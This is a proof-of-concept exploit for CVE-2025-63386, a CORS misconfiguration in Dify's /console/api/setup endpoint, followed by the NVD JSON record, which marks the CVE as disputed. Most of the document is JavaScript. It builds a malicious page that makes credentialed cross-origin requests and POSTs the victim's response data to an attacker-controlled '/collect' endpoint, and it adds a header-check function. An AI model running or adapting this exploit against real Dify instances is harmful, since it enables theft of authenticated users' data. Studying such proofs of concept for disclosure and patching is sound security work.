CVE-2025-63386

import fetch from 'node-fetch'; // CVE-2025-63386 PoC - CORS Misconfiguration in Dify /console/api/setup // This PoC demonstrates how an attacker can exploit the CORS vulnerability const targetUrl = 'https://target-dify-instance.com'; const attackerServer = 'https://attacker-controlled-server.com'; // Step 1: Create a malicious page that triggers the CORS request const maliciousPage = ` <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <script> // Set the attacker's origin const attackerOrigin = '${attackerServer}'; // Make authenticated request to vulnerable endpoint fetch('${targetUrl}/console/api/setup', { method: 'GET', credentials: 'include', // Include cookies for authenticated requests headers: { 'Origin': attackerOrigin } }) .then(response => { // Check if CORS allows the request with credentials const acao = response.headers.get('Access-Control-Allow-Origin'); const acac = response.headers.get('Access-Control-Allow-Credentials'); console.log('Access-Control-Allow-Origin:', acao); console.log('Access-Control-Allow-Credentials:', acac); if (acao === attackerOrigin && acac === 'true') { // Vulnerable! Can exfiltrate data return response.json(); } }) .then(data => { // Exfiltrate sensitive data to attacker's server if (data) { fetch(attackerOrigin + '/collect', { method: 'POST', body: JSON.stringify(data), credentials: 'include' }); } }) .catch(error => console.error('Error:', error)); </script> </body> </html> `; // Step 2: Verify CORS misconfiguration async function verifyVulnerability() { try { const response = await fetch(`${targetUrl}/console/api/setup`, { method: 'OPTIONS', headers: { 'Origin': attackerServer, 'Access-Control-Request-Method': 'GET', 'Access-Control-Request-Headers': 'content-type,authorization' } }); const acao = response.headers.get('Access-Control-Allow-Origin'); const acac = response.headers.get('Access-Control-Allow-Credentials'); console.log('=== CVE-2025-63386 Vulnerability Check ==='); console.log('Target:', targetUrl); console.log('Access-Control-Allow-Origin:', acao); console.log('Access-Control-Allow-Credentials:', acac); if (acao === attackerServer && acac === 'true') { console.log('[VULNERABLE] CORS misconfiguration detected!'); console.log('Arbitrary origins are allowed with credentials.'); } else { console.log('[SAFE] CORS policy appears to be properly configured.'); } } catch (error) { console.error('Error verifying vulnerability:', error.message); } } verifyVulnerability(); module.exports = { maliciousPage, verifyVulnerability };

{"cve": {"id": "CVE-2025-63386", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:54.533", "lastModified": "2026-02-11T15:16:16.123", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains to make authenticated requests. NOTE: the Supplier disputes this because the endpoint configuration is intentional to support bootstrap."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "ABF9FC69-C390-446E-830C-5F8B0A0488F2"}]}]}], "references": [{"url": "https://gist.github.com/Cristliu/1610daac87c711ac3e0250c58f5cc4f9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gist.github.com/Cristliu/8ad993126be05c9210c71cc7d49fa112", "source": "[email protected]"}, {"url": "https://github.com/langgenius/dify/discussions", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/langgenius/dify/pull/32224", "source": "[email protected]"}]}}